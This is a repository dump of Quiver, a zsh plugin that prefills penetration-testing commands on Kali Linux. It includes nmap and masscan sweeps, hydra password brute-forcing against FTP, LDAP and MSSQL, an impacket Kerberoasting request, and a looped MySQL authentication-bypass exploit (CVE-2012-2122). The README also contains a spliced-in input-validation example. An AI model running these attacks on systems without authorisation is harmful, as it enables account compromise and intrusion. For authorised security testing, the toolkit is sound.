Repository: stevemcilwain/quiver
Branch: master
Commit: 64cc42a29341
Files: 76
Total size: 179.8 KB
Directory structure:
gitextract_8lk53koa/
├── .gitattributes
├── .gitignore
├── .vscode/
│ └── settings.json
├── LICENSE
├── README.md
├── RELEASES.md
├── VERSION
├── modules/
│ ├── qq-encoding.zsh
│ ├── qq-enum-dhcp.zsh
│ ├── qq-enum-dns.zsh
│ ├── qq-enum-ftp.zsh
│ ├── qq-enum-host.zsh
│ ├── qq-enum-kerb.zsh
│ ├── qq-enum-ldap.zsh
│ ├── qq-enum-mssql.zsh
│ ├── qq-enum-mysql.zsh
│ ├── qq-enum-network.zsh
│ ├── qq-enum-nfs.zsh
│ ├── qq-enum-oracle.zsh
│ ├── qq-enum-pop3.zsh
│ ├── qq-enum-rdp.zsh
│ ├── qq-enum-smb.zsh
│ ├── qq-enum-web-aws.zsh
│ ├── qq-enum-web-dirs.zsh
│ ├── qq-enum-web-eslastic.zsh
│ ├── qq-enum-web-fuzz.zsh
│ ├── qq-enum-web-js.zsh
│ ├── qq-enum-web-php.zsh
│ ├── qq-enum-web-ssl.zsh
│ ├── qq-enum-web-vuln.zsh
│ ├── qq-enum-web.zsh
│ ├── qq-exploit.zsh
│ ├── qq-install.zsh
│ ├── qq-kali.zsh
│ ├── qq-log.zsh
│ ├── qq-notes.zsh
│ ├── qq-pivot.zsh
│ ├── qq-project-custom.zsh
│ ├── qq-project.zsh
│ ├── qq-recon-domains.zsh
│ ├── qq-recon-github.zsh
│ ├── qq-recon-networks.zsh
│ ├── qq-recon-org.zsh
│ ├── qq-recon-subs.zsh
│ ├── qq-scripts.zsh
│ ├── qq-shell-handlers-msf.zsh
│ ├── qq-shell-handlers.zsh
│ ├── qq-shell-tty.zsh
│ ├── qq-srv.zsh
│ ├── qq-vars-global.zsh
│ ├── qq-vars.zsh
│ └── qq.zsh
├── payloads/
│ ├── aka.ms.pem
│ ├── aliases.rc
│ ├── github-dorks-commits.txt
│ ├── msf-windows-payloads.txt
│ ├── recon-dorks-github.txt
│ ├── recon-dorks-google.txt
│ ├── resolvers.txt
│ ├── secrets-content.json
│ ├── secrets-files.json
│ ├── tcp-ports.txt
│ ├── user-agents.txt
│ ├── web-file-upload-bypass-bytes.txt
│ ├── web-file-upload-bypass.txt
│ ├── wordlist-api.txt
│ └── wordlists.txt
├── quiver.code-workspace
├── quiver.plugin.zsh
├── scripts/
│ ├── dns-reverse-brute.zsh
│ ├── image-gen.js
│ ├── recon.zsh
│ ├── webrecon.zsh
│ ├── wildcards.py
│ └── wildcards.sh
└── system/
└── hidpi.sh
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitattributes
================================================
# Auto detect text files and perform LF normalization
* text=auto
================================================
FILE: .gitignore
================================================
# ignore qq-custom.zsh module
modules/qq-custom.zsh
log.txt
remote_checked.txt
remote_ver.txt
================================================
FILE: .vscode/settings.json
================================================
{
"editor.detectIndentation": false
}
================================================
FILE: LICENSE
================================================
MIT License
Copyright (c) 2020 Steve McIlwain
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
================================================
FILE: README.md
================================================
# Quiver : A Meta-Tool for Kali Linux
Quiver is an organized namespace of shell functions that pre-fill commands in your terminal so that you can ditch your reliance on notes, copying, pasting, editing, copying and pasting again. Quiver helps you remember how to use every tool in your arsenal and doesn't hide them behind scripting that can be cumbersome to maintain or update. Instead you can use Quiver to build a composable, on-the-fly workflow for every situation.
Quiver doesn't cover all tools; it's my own curated collection, which I am still adding to and updating. There are so many tools for many different types of engagements and targets, so I just try to focus on tools that are maintained and current. Feel free to ask for the inclusion of tools you prefer in the issues list.
# Release 1.0
After months of hard work during lockdown, I am happy to introduce the 1.0 release of Quiver! This version contains many improvements over previous versions such as per-namespace help and installers, auto-fill variables such as RHOST, RPORT, LHOST, LPORT, PROJECT, WORDLIST, URL and global configuration settings for customizing settings like a menu of your favorite wordlists. If you've been using Quiver before now, then many of the changes in 1.0 are breaking changes. Please familiarize yourself with the new commands using `qq-help`. If you previously were storing Quiver values in .zshrc, most of these can now be stored as global vars using `qq-vars-global`.
* [RELEASES.md](RELEASES.md)
# Features
* Prefills the commands within a terminal
* Well-organized commands with tab auto-completion
* Installs as a ZSH / Oh-My-ZSH shell plugin
* Customizable settings, Global variables
* Recon phase commands for OSINT
* Enumeration of common services
* Web enumeration, brute-forcing and hacking
* Exploit compilation helpers
* Reverse shell handlers
* Content serving commands
* Built-in logbook for on-the-fly notes, saving commands
* Render markdown notes to the command line
* Kali Linux system management
* Update notification and install
* Installers for dependencies
# Installation
Quiver requires the following:
* ZSH (apt-get install zsh)
* oh-my-zsh (optional requirement but recommended: https://ohmyz.sh/)
* Kali Linux (https://kali.org)
Clone the repo to your OMZ custom plugins folder.
```bash
git clone https://github.com/stevemcilwain/quiver.git ~/.oh-my-zsh/custom/plugins/quiver
```
Edit ~/.zshrc to load the plugin.
```
plugins=(git quiver)
```
Source .zshrc to load the plugin and you're done. On first load, Quiver will install a few core packages.
```
source ~/.zshrc
```
## Getting Started
Quiver organizes commands into namespaces starting with `qq-`, such as `qq-enum-web` or `qq-recon-domains`.
To see an overview of all namespaces, simply use `qq-help`. Each namespace also has its own help command, such as `qq-enum-web-help`, that provides a listing of available commands. All commands support tab completion and search.
## Installing Dependencies
Every namespace has a qq-<namespace>-install command that will install all of the tools relevant to that namespace. You can install just the tools you need, or use `qq-install-all` to run the installers of all namespaces.
## Workflow
Quiver is meant to provide a composable, on-the-fly workflow. It replaces the common, painful raw workflow of reading your notes, finding a command, copying, pasting, replacing the values with target values, copying, pasting and running. Some rely heavily on completely automated scripts or frameworks that run all the commands for a workflow and output well-formatted data. While these scripts are great for many use cases, they can often be brittle, hide the underlying tools and techniques, and be cumbersome to modify. Instead, Quiver gives you a happy medium: you can run commands quickly and easily with well-organized output, composing your workflow as you go depending on the targets and context.
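Because each Quiver command interpolates session variables such as `__RHOST` and `__NETWORK` straight into the prefilled command line, a value containing shell metacharacters would become part of the command that is run. The following bash functions are an added example, not code from the Quiver repository: they validate those values before building the same `nmap` sweep command that `qq-enum-dns-nmap-sweep` prefills. The `qq_` function names and the output-directory argument are assumptions for the example, and zsh's `print -z` prefill is replaced by printing the command.

```bash
#!/usr/bin/env bash
# Added example (not part of Quiver): validate target variables before they
# are interpolated into a prefilled command, so a stray metacharacter in a
# target value cannot change the command that the operator runs.

# Return 0 if $1 is a dotted-quad IPv4 address with each octet in 0..255.
qq_is_ipv4() {
  local ip=$1 octet
  local re='^([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})$'
  [[ $ip =~ $re ]] || return 1
  for octet in "${BASH_REMATCH[@]:1:4}"; do
    # 10# forces decimal so a leading zero is not read as octal.
    (( 10#$octet <= 255 )) || return 1
  done
  return 0
}

# Return 0 if $1 is an IPv4 network in CIDR notation, e.g. 10.0.0.0/24.
qq_is_cidr() {
  local net=$1
  [[ $net == */* ]] || return 1
  local addr=${net%/*} bits=${net#*/}
  qq_is_ipv4 "$addr" || return 1
  [[ $bits =~ ^[0-9]{1,2}$ ]] && (( 10#$bits <= 32 ))
}

# Return 0 if $1 is a DNS host name made of RFC 1123 labels only.
qq_is_hostname() {
  local name=$1
  local label='[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?'
  local re="^(${label}\.)*${label}\$"
  (( ${#name} <= 253 )) || return 1
  [[ $name =~ $re ]]
}

# Accept the kinds of value __RHOST is meant to hold: an IPv4 address or a
# host name. Anything else (spaces, ';', '$(...)', ...) is rejected.
qq_check_rhost() {
  qq_is_ipv4 "$1" || qq_is_hostname "$1"
}

# Build the command qq-enum-dns-nmap-sweep prefills, but only after the
# network has been validated. $1 = CIDR network, $2 = output directory for
# nmap -oA (Quiver derives it from the project; here it is an argument).
qq_enum_dns_nmap_sweep_cmd() {
  local network=$1 outdir=$2
  if ! qq_is_cidr "$network"; then
    echo "refusing to build command: '$network' is not an IPv4 CIDR network" >&2
    return 1
  fi
  # %q shell-quotes the path so spaces or metacharacters cannot split the command.
  printf 'sudo nmap -n -Pn -sS -sU -p53 %s -oA %q/dns-sweep\n' "$network" "$outdir"
}
```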
## Example Workflow
Here is an example workflow for bug bounty hunting:
### Prep
```bash
# if you have markdown notes, configure the path
qq-vars-global-set-notes
# set some session variables for the bounty target
qq-vars-set-project
qq-vars-set-domain
# generate scope files from the bounty url
qq-project-rescope
# save vars for other terminal sessions, qq-vars-load
qq-vars-save
```
### Passive Recon
```bash
# search for target files
qq-recon-org-files
# search downloaded files for urls
qq-recon-org-files-urls
# mine github repos for secrets
qq-recon-github-gitrob
# check dns records
qq-enum-dns-dnsrecon
# look for ASNs and networks
qq-recon-networks-amass-asns
qq-recon-networks-bgpview-ipv4
# get subdomains
qq-recon-subs-subfinder
# resolve and parse subdomains
qq-recon-subs-resolve-massdns
qq-recon-subs-resolve-parse
```
### Active Web Enumeration
```bash
# Download robots.txt
qq-enum-web-dirs-robots
# ID a WAF if present
qq-enum-web-waf
# Parse SSL certs
qq-enum-web-ssl-certs
# Spider the site
qq-enum-web-gospider
# Brute force URIs
qq-enum-web-dirs-ffuf
# Read your notes
qq-notes
```
================================================
FILE: RELEASES.md
================================================
# Releases
## 1.0 6/4/2020
Complete refactor and reorganization, including:
* Added qq-<namespace>-help commands to all modules
* Added qq-<namespace>-install commands to all modules
* More variables that auto-populate in qq-vars
* Persistent variables in qq-vars-global for customization of settings
* New qq-shell namespaces
* Better organization in qq-recon namespaces
* qq-bounty consolidated into qq-project, custom project commands moved to qq-project-custom
* qq-notes updated with more features
* New qq-kali namespace added with system commands
* qq-install refactored to include custom installers
* New qq-exploit namespace added
* New qq-enum-* namespaces added for more services
## 0.16 3/28/2020
* Fixed qq-bounty.zsh
* Fixed qq-project.zsh: logfile and output settings
* Fixed qq-vars.zsh recursively creating directories in __OUTPUT
## 0.15 3/24/2020
* Added qq-enum-mssql.zsh
* Added qq-enum-mysql.zsh
* Added qq-enum-oracle.zsh
* Added qq-enum-nfs.zsh
* Added qq-enum-pop3.zsh
* qq-srv.zsh: added 3 new listeners for tar, nc>file and b64
## 0.14 3/24/2020
* quiver.plugin.zsh: added zstyle tab autocompletion
  * use qq-<tab> to search for commands across any namespace
* qq-install.zsh
  * added jsbeautifier
* qq-vars.zsh: set-output will now create the root directory if missing
## 0.12 3/22/2020
* qq-vars.zsh: Added global variables for the most common arguments, load and save
* qq-srv.zsh: added updog
* qq-project.zsh added folder scaffolding for projects / engagements
* qq-log.zsh integration with qq-vars
* Major change to output on all methods, uses $__OUTPUT as the directory from qq-vars.zsh
* Lot of minor changes
## 0.11 - 3/9/2020
* You can now specify a path to your markdown notes by setting $__NOTES
* qq-notes.zsh: notes search and display
* qq-exploit.zsh: compilation helpers
* qq-enum-web-php: php specific enumeration such as lfi, rfi and scans
* minor fixes
## 0.10 - 3/4/2020
* Added module: qq-enum-kerb.zsh for Kerberos enumeration functions
* Added module: qq-enum-rdp.zsh for RDP enumeration functions
* Added module: qq-enum-smb.zsh for SMB enumeration functions
* Added qq-debug to print ~/.quiver/log.txt
* Fixed glow commands to not use pager, leaving the output available in the console window
## 0.9 - 3/4/2020
* Minor fixes and improvements
* Added scripts/recon.zsh
* Added qq-bounty for bug bounty helpers
* Added rescope to install script and qq-bounty
* Added qq-enum-ldap
* Removed noisy banner and log loading to ./quiver/log.txt
* Added qq-enum-ftp-notes-vsftp
* Added qq-custom.zsh module for your custom aliases and functions (ignored)
* Added .gitignore (for qq-custom.zsh)
## 0.8 - 2/25/2020
* qq-pivot: added ssh tunneling commands
* qq-log: added short aliases
* qq-enum-web: moved fuzzing to qq-enum-web-fuzz
* qq-enum-web-fuzz: added/grouped (not dirs) fuzzing commands
* qq-enum-web-xss: added XSS helpers
* qq-enum-web-ssl: added SSL commands and notes
* qq-aliases: better organization, added aliases for custom functions
================================================
FILE: VERSION
================================================
1.0.0
================================================
FILE: modules/qq-encoding.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-encoding
#############################################################
qq-encoding-help() {
cat << "DOC"
qq-encoding
----------
The encoding namespace provides commands for encoding and decoding values.
Commands
--------
qq-encoding-file-to-b64: encodes plain text file to base64, optional $1 as file
qq-encoding-file-from-b64: decodes base64 file to plain text, optional $1 as file
DOC
}
qq-encoding-file-to-b64() {
if [ "$#" -eq "1" ]
then
print -z "cat $1 | base64 > $1.b64"
else
local f && __askpath f FILE $(pwd)
print -z "cat ${f} | base64 > ${f}.b64"
fi
}
qq-encoding-file-from-b64() {
if [ "$#" -eq "1" ]
then
print -z "cat $1 | base64 -d > $1.txt"
else
local f && __askpath f FILE $(pwd)
print -z "cat ${f} | base64 -d > ${f}.txt"
fi
}
================================================
FILE: modules/qq-enum-dhcp.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-dhcp
#############################################################
qq-enum-dhcp-help() {
cat << "DOC"
qq-enum-dhcp
-------------
The qq-enum-dhcp namespace contains commands for scanning and enumerating DHCP servers.
Commands
--------
qq-enum-dhcp-install: installs dependencies
qq-enum-dhcp-nmap-sweep: scan a network for services
qq-enum-dhcp-tcpdump: capture traffic to and from a host
qq-enum-dhcp-discover-nmap: broadcast DHCP discover packets
DOC
}
qq-enum-dhcp-install() {
__info "Running $0..."
__pkgs tcpdump nmap
}
# named to match the help listing (qq-enum-dhcp-nmap-sweep)
qq-enum-dhcp-nmap-sweep() {
__check-project
qq-vars-set-network
print -z "sudo nmap -n -Pn -sU -p67 ${__NETWORK} -oA $(__netpath)/dhcp-sweep"
}
qq-enum-dhcp-tcpdump() {
__check-project
qq-vars-set-iface
qq-vars-set-rhost
print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and udp port 67 and port 68 -w $(__hostpath)/dhcp.pcap"
}
qq-enum-dhcp-discover-nmap() {
print -z "sudo nmap -v --script broadcast-dhcp-discover"
}
================================================
FILE: modules/qq-enum-dns.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-dns
#############################################################
qq-enum-dns-help() {
cat << "DOC"
qq-enum-dns
-------------
The qq-enum-dns namespace contains commands for scanning and enumerating DNS records and servers.
Commands are executed against specific name servers (__RHOST) rather than public resolvers.
Commands
--------
qq-enum-dns-install: installs dependencies
qq-enum-dns-nmap-sweep: scan a network for services
qq-enum-dns-tcpdump: capture traffic to and from a host
qq-enum-dns-host-txfr: attempt a zone transfer
qq-enum-dns-host-all: list all types
qq-enum-dns-host-txt: list txt records
qq-enum-dns-host-mx: list mx records
qq-enum-dns-host-ns: list ns records
qq-enum-dns-host-srv: list srv records
qq-enum-dns-nmap-ad: discover Active Directory related records
qq-enum-dns-dnsrecon: discover dns records, servers and attempt zone txfrs
qq-enum-dns-dnsrecon-reverse: do reverse lookups on an IP network
DOC
}
qq-enum-dns-install() {
__info "Running $0..."
__pkgs tcpdump nmap dnsutils dnsrecon
}
qq-enum-dns-nmap-sweep() {
__check-project
qq-vars-set-network
print -z "sudo nmap -n -Pn -sS -sU -p53 ${__NETWORK} -oA $(__netpath)/dns-sweep"
}
qq-enum-dns-tcpdump() {
__check-project
__check-iface
qq-vars-set-rhost
# port 53 without a protocol qualifier captures both UDP and TCP DNS traffic
print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and port 53 -w $(__hostpath)/dns.pcap"
}
qq-enum-dns-host-txfr() {
qq-vars-set-rhost
qq-vars-set-domain
print -z "host -l ${__DOMAIN} ${__RHOST}"
}
qq-enum-dns-host-all() {
qq-vars-set-domain
qq-vars-set-rhost
print -z "host -a ${__DOMAIN} ${__RHOST}"
}
qq-enum-dns-host-txt() {
qq-vars-set-domain
qq-vars-set-rhost
print -z "host -t txt ${__DOMAIN} ${__RHOST}"
}
qq-enum-dns-host-mx() {
qq-vars-set-domain
qq-vars-set-rhost
print -z "host -t mx ${__DOMAIN} ${__RHOST}"
}
qq-enum-dns-host-ns() {
qq-vars-set-domain
qq-vars-set-rhost
print -z "host -t ns ${__DOMAIN} ${__RHOST}"
}
qq-enum-dns-host-srv() {
qq-vars-set-domain
qq-vars-set-rhost
print -z "host -t srv ${__DOMAIN} ${__RHOST}"
}
qq-enum-dns-nmap-ad() {
__check-project
qq-vars-set-domain
qq-vars-set-rhost
print -z "nmap --script dns-srv-enum --script-args dns-srv-enum.domain=${__DOMAIN} ${__RHOST} -oN $(__dompath)/nmap-AD.txt"
}
qq-enum-dns-dnsrecon() {
__check-project
qq-vars-set-domain
qq-vars-set-rhost
print -z "dnsrecon -d ${__DOMAIN} -n ${__RHOST} -a -s -w -z --threads 10 -c $(__dompath)/dns.csv"
}
qq-enum-dns-dnsrecon-reverse() {
__check-project
# __NETWORK is used in the command below, so it must be set as well as __RHOST
qq-vars-set-network
qq-vars-set-rhost
mkdir -p ${__PROJECT}/domains
print -z "dnsrecon -r ${__NETWORK} -n ${__RHOST} -c ${__PROJECT}/domains/revdns.csv"
}
================================================
FILE: modules/qq-enum-ftp.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-ftp
#############################################################
qq-enum-ftp-help() {
cat << "DOC"
qq-enum-ftp
-------------
The qq-enum-ftp namespace contains commands for scanning and enumerating FTP servers.
Commands
--------
qq-enum-ftp-install: installs dependencies
qq-enum-ftp-nmap-sweep: scan a network for services
qq-enum-ftp-tcpdump: capture traffic to and from a host
qq-enum-ftp-hydra: brute force passwords for a user account
qq-enum-ftp-lftp-grep: search (grep) the target system
qq-enum-ftp-wget-mirror: mirror the FTP server locally
DOC
}
qq-enum-ftp-install() {
__info "Running $0..."
__pkgs tcpdump nmap hydra ftp lftp wget
}
# named to match the help listing (qq-enum-ftp-nmap-sweep)
qq-enum-ftp-nmap-sweep() {
__check-project
qq-vars-set-network
print -z "sudo nmap -n -Pn -sS -p21 ${__NETWORK} -oA $(__netpath)/ftp-sweep"
}
qq-enum-ftp-tcpdump() {
__check-project
qq-vars-set-iface
qq-vars-set-rhost
print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 21 -w $(__hostpath)/ftp.pcap"
}
qq-enum-ftp-hydra() {
__check-project
qq-vars-set-rhost
__check-user
print -z "hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/ftp-hydra-brute.txt ${__RHOST} FTP"
}
qq-enum-ftp-lftp-grep() {
qq-vars-set-rhost
local q && __askvar q QUERY
# run lftp's find command non-interactively and filter the listing by the query
print -z "lftp -e 'find; exit' ftp://${__RHOST}/ | grep -i \"${q}\" "
}
qq-enum-ftp-wget-mirror() {
__warn "The destination site will be mirrored in the current directory"
qq-vars-set-rhost
local u && __prefill u USER "anonymous"
local p && __prefill p PASSWORD "anonymous@example.com"
print -z "wget --mirror ftp://${u}:${p}@${__RHOST}"
}
================================================
FILE: modules/qq-enum-host.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-host
#############################################################
qq-enum-host-help() {
cat << "DOC"
qq-enum-host
-------------
The qq-enum-host namespace contains commands for scanning and enumerating
an individual host.
Commands
--------
qq-enum-host-install: installs dependencies
qq-enum-host-tcpdump: capture traffic to and from a host
qq-enum-host-nmap-top: syn scan of the top 1000 ports
qq-enum-host-nmap-top-discovery: syn scan of the top 1000 ports with versioning and scripts
qq-enum-host-nmap-all: syn scan all ports
qq-enum-host-nmap-all-discovery: syn scan all ports with versioning and scripts
qq-enum-host-nmap-udp: udp scan top 100 ports
qq-enum-host-masscan-all-tcp: scan all tcp ports
qq-enum-host-masscan-all-udp: scan all udp ports
qq-enum-host-nmap-lse-grep: search nmap lse scripts
qq-enum-host-ip: look up public information about an IP address via iplist.cc
DOC
}
qq-enum-host-install() {
__info "Running $0..."
__pkgs tcpdump nmap masscan curl
}
qq-enum-host-tcpdump() {
__check-project
__check-iface
qq-vars-set-rhost
print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} -w $(__hostpath)/tcpdump.pcap"
}
qq-enum-host-nmap-top(){
__check-project
qq-vars-set-rhost
print -z "sudo nmap -vvv -Pn -sS --top-ports 1000 --open ${__RHOST} -oA $(__hostpath)/nmap-top"
}
qq-enum-host-nmap-top-discovery(){
__check-project
qq-vars-set-rhost
print -z "sudo nmap -vvv -Pn -sS --top-ports 1000 --open -sC -sV ${__RHOST} -oA $(__hostpath)/nmap-top-discovery"
}
qq-enum-host-nmap-all() {
__check-project
qq-vars-set-rhost
print -z "sudo nmap -vvv -Pn -sS -p- -T4 --open ${__RHOST} -oA $(__hostpath)/nmap-all"
}
qq-enum-host-nmap-all-discovery() {
__check-project
qq-vars-set-rhost
print -z "sudo nmap -vvv -Pn -sS -p- -sC -sV --open ${__RHOST} -oA $(__hostpath)/nmap-all-discovery"
}
qq-enum-host-nmap-udp() {
__check-project
qq-vars-set-rhost
print -z "sudo nmap -v -Pn -sU --top-ports 100 -sV -sC --open ${__RHOST} -oA $(__hostpath)/nmap-udp"
}
qq-enum-host-masscan-all-tcp() {
__check-iface
__check-project
qq-vars-set-rhost
print -z "masscan -p1-65535 --open-only ${__RHOST} --rate=1000 -e ${__IFACE} -oL $(__hostpath)/masscan-all-tcp.txt"
}
qq-enum-host-masscan-all-udp() {
__check-iface
__check-project
qq-vars-set-rhost
print -z "masscan -pU:1-65535 --open-only ${__RHOST} --rate=1000 -e ${__IFACE} -oL $(__hostpath)/masscan-all-udp.txt"
}
qq-enum-host-nmap-lse-grep() {
local q && __askvar q QUERY
print -z "ls /usr/share/nmap/scripts/* | grep -ie \"${q}\" "
}
qq-enum-host-ip() {
__check-project
qq-vars-set-rhost
print -z "curl -s \"https://iplist.cc/api/${__RHOST}\" | tee $(__hostpath)/ip.json "
}
================================================
FILE: modules/qq-enum-kerb.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-kerb
#############################################################
qq-enum-kerb-help() {
cat << "DOC"
qq-enum-kerb
------------
The qq-enum-kerb namespace contains commands for scanning and
enumerating kerberos records and servers.
Commands
--------
qq-enum-kerb-install: installs dependencies
qq-enum-kerb-nmap-sweep: scan a network for services
qq-enum-kerb-tcpdump: capture traffic to and from a host
qq-enum-kerb-users: enumerate domain users
qq-enum-kerb-kerberoast: get SPN for a service account
DOC
}
qq-enum-kerb-install() {
__info "Running $0..."
__pkgs tcpdump nmap impacket-scripts
}
qq-enum-kerb-nmap-sweep() {
__check-project
qq-vars-set-network
print -z "sudo nmap -n -Pn -sS -p88 ${__NETWORK} -oA $(__netpath)/kerb-sweep"
}
qq-enum-kerb-tcpdump() {
__check-project
qq-vars-set-iface
qq-vars-set-rhost
print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 88 -w $(__hostpath)/kerb.pcap"
}
qq-enum-kerb-users() {
qq-vars-set-rhost
local realm && __askvar realm REALM
print -z "nmap -vvv -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm=${realm},userdb=/usr/share/seclists/Usernames/Names/names.txt ${__RHOST}"
}
qq-enum-kerb-kerberoast() {
__ask "Enter target AD domain (must also be set in your hosts file)"
qq-vars-set-domain
__ask "Enter service user account"
__check-user
__ask "Enter the IP address of the target domain controller"
qq-vars-set-rhost
print -z "impacket-GetUserSPNs -request ${__DOMAIN}/${__USER} -dc-ip ${__RHOST} "
}
================================================
FILE: modules/qq-enum-ldap.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-ldap
#############################################################
qq-enum-ldap-help() {
cat << "DOC"
qq-enum-ldap
------------
The qq-enum-ldap namespace contains commands for scanning and
enumerating Active Directory DC, GC and LDAP servers.
Commands
--------
qq-enum-ldap-install: installs dependencies
qq-enum-ldap-nmap-sweep: scan a network for services
qq-enum-ldap-tcpdump: capture traffic to and from a host
qq-enum-ldap-ctx: query ldap naming contexts
qq-enum-ldap-search-anon: connect with anonymous bind and query ldap
qq-enum-ldap-search-auth: connect with authenticated bind and query ldap
qq-enum-ldap-whoami: send ldap whoami request
qq-enum-ldap-hydra: brute force passwords for a user account
DOC
}
qq-enum-ldap-install() {
__info "Running $0..."
__pkgs tcpdump nmap ldap-utils hydra
}
qq-enum-ldap-nmap-sweep() {
__check-project
qq-vars-set-network
print -z "sudo nmap -n -Pn -sS -sU -p389,636,3269 ${__NETWORK} -oA $(__netpath)/ldap-sweep"
}
qq-enum-ldap-tcpdump() {
__check-project
qq-vars-set-iface
qq-vars-set-rhost
# a packet cannot match three ports at once, so the ports are combined with "or"
print -z "sudo tcpdump -i ${__IFACE} 'host ${__RHOST} and tcp and (port 389 or port 636 or port 3269)' -w $(__hostpath)/ldap.pcap"
}
qq-enum-ldap-ctx() {
__ask "Enter the address of the target DC, GC or LDAP server"
qq-vars-set-rhost
print -z "ldapsearch -x -h ${__RHOST} -s base -b \"\" namingcontexts"
}
qq-enum-ldap-search-anon() {
__ask "Enter the address of the target DC, GC or LDAP server"
qq-vars-set-rhost
__ask "Enter a distinguished name (DN), such as: DC=example,DC=com"
local dn && __askvar dn DN
print -z "ldapsearch -x -h ${__RHOST} -s sub -b \"${dn}\" "
}
qq-enum-ldap-search-auth() {
__ask "Enter the address of the target DC, GC or LDAP server"
qq-vars-set-rhost
__ask "Enter a distinguished name (DN), such as: DC=example,DC=com"
local dn && __askvar dn DN
__ask "Enter a user account with bind and read permissions to the directory"
__check-user
# -D is the bind identity, -W prompts for its password, -b is the search base
print -z "ldapsearch -x -h ${__RHOST} -D \"${__USER}\" -W -b \"${dn}\" -s sub \"(objectClass=*)\" "
}
qq-enum-ldap-whoami() {
__ask "Enter the address of the target DC, GC or LDAP server"
qq-vars-set-rhost
print -z "ldapwhoami -h ${__RHOST} -w \"non-existing-user\" "
}
qq-enum-ldap-hydra() {
__check-project
qq-vars-set-rhost
__check-user
print -z "hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/ldap-hydra-brute.txt ${__RHOST} LDAP"
}
================================================
FILE: modules/qq-enum-mssql.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-mssql
#############################################################
qq-enum-mssql-help() {
cat << "DOC"
qq-enum-mssql
-------------
The qq-enum-mssql namespace contains commands for scanning and
enumerating MS SQL Server services and databases.
Commands
--------
qq-enum-mssql-install: installs dependencies
qq-enum-mssql-nmap-sweep: scan a network for services
qq-enum-mssql-tcpdump: capture traffic to and from a host
qq-enum-mssql-sqsh: make an interactive database connection
qq-enum-mssql-impacket-client: connect using impacket as a sql client
qq-enum-mssql-hydra: brute force passwords for a user account
DOC
}
qq-enum-mssql-install() {
__info "Running $0..."
__pkgs tcpdump nmap sqsh impacket-scripts hydra
}
qq-enum-mssql-nmap-sweep() {
__check-project
qq-vars-set-network
print -z "sudo nmap -n -Pn -sS -sU -p T:1433,U:1434 ${__NETWORK} -oA $(__netpath)/mssql-sweep"
}
qq-enum-mssql-tcpdump() {
__check-project
qq-vars-set-iface
qq-vars-set-rhost
print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 1433 -w $(__hostpath)/mssql.pcap"
}
qq-enum-mssql-sqsh() {
__check-project
qq-vars-set-rhost
__check-user
print -z "sqsh -S ${__RHOST} -U ${__USER}"
}
qq-enum-mssql-impacket-client() {
qq-vars-set-rhost
__check-user
local db && __askvar db DATABASE
print -z "python3 ${__IMPACKET}/mssqlclient.py ${__USER}@${__RHOST} -db ${db} -windows-auth "
}
qq-enum-mssql-hydra() {
__check-project
qq-vars-set-rhost
__check-user
print -z "hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/mssql-hydra-brute.txt ${__RHOST} MS-SQL"
}
================================================
FILE: modules/qq-enum-mysql.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-mysql
#############################################################
qq-enum-mysql-help() {
cat << "DOC"
qq-enum-mysql
-------------
The qq-enum-mysql namespace contains commands for scanning and
enumerating mysql server services and databases.
Commands
--------
qq-enum-mysql-install: installs dependencies
qq-enum-mysql-nmap-sweep: scan a network for services
qq-enum-mysql-tcpdump: capture traffic to and from a host
qq-enum-mysql-client: connect using the mysql client
qq-enum-mysql-auth-bypass: attempt auth bypass
qq-enum-mysql-hydra: brute force passwords for a user account
DOC
}
qq-enum-mysql-install() {
__info "Running $0..."
__pkgs tcpdump nmap mysql
}
qq-enum-mysql-nmap-sweep() {
__check-project
qq-vars-set-network
print -z "sudo nmap -n -Pn -sS -p 3306 ${__NETWORK} -oA $(__netpath)/mysql-sweep"
}
qq-enum-mysql-tcpdump() {
__check-project
qq-vars-set-iface
qq-vars-set-rhost
print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 3306 -w $(__hostpath)/mysql.pcap"
}
qq-enum-mysql-client(){
qq-vars-set-rhost
__check-user
print -z "mysql -u ${__USER} -p -h ${__RHOST}"
}
qq-enum-mysql-auth-bypass() {
qq-vars-set-rhost
__info "CVE-2012-2122"
print -z "for i in {1..1000}; do mysql -u root --password=bad -h ${__RHOST} 2>/dev/null; done"
}
qq-enum-mysql-hydra() {
__check-project
